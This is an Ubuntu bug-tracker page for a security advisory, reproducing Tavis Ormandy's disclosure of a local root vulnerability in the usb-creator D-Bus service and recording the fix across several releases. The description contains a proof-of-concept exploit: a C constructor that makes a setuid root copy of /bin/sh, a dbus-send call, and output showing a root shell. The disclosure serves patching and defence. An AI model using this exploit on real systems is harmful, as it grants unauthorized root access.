Tavis Ormandy discovered a local root vulnerability with the com.ubuntu.USBCreator dbus service
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
usb-creator (Ubuntu) |
Fix Released
|
Undecided
|
Marc Deslauriers | ||
Precise |
Fix Released
|
Undecided
|
Marc Deslauriers | ||
Trusty |
Fix Released
|
Undecided
|
Marc Deslauriers | ||
Utopic |
Fix Released
|
Undecided
|
Marc Deslauriers | ||
Vivid |
Fix Released
|
Undecided
|
Marc Deslauriers |
Bug Description
Reported on oss-security: http://
Text from Tavis follows:
Hello,
[as-per previous discussion on the vendors list, skipping closed
discussion of low-severity issue]
On my Ubuntu VM, I have a D-Bus service listening on
com.ubuntu.
default.
It looks like the author intended for all the methods to call
check_polkit, but KVMTest doesn't.
This seems like an obvious mistake, and the following appears to work
on my machine:
$ cat > test.c
void __attribute_
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=
/com/ubuntu/
dict:string:
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)
Thanks, Tavis.
Changed in usb-creator (Ubuntu Precise): | |
status: | New → Confirmed |
Changed in usb-creator (Ubuntu Trusty): | |
status: | New → Confirmed |
Changed in usb-creator (Ubuntu Utopic): | |
status: | New → Confirmed |
Changed in usb-creator (Ubuntu Vivid): | |
status: | New → Confirmed |
Changed in usb-creator (Ubuntu Precise): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
Changed in usb-creator (Ubuntu Trusty): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
Changed in usb-creator (Ubuntu Utopic): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
Changed in usb-creator (Ubuntu Vivid): | |
assignee: | nobody → Marc Deslauriers (mdeslaur) |
information type: | Public Security → Private Security |
information type: | Private Security → Public Security |
This bug was fixed in the package usb-creator - 0.2.38.3ubuntu0.1
---------------
usb-creator (0.2.38.3ubuntu0.1) precise-security; urgency=medium
* SECURITY UPDATE: privilege escalation via missing polkit check creator- helper, dbus/com. ubuntu. usbcreator. policy. in: add
(LP: #1447396)
- bin/usb-
proper polkit integration for KVM use.
- CVE number pending
-- Marc Deslauriers <email address hidden> Wed, 22 Apr 2015 23:18:51 -0400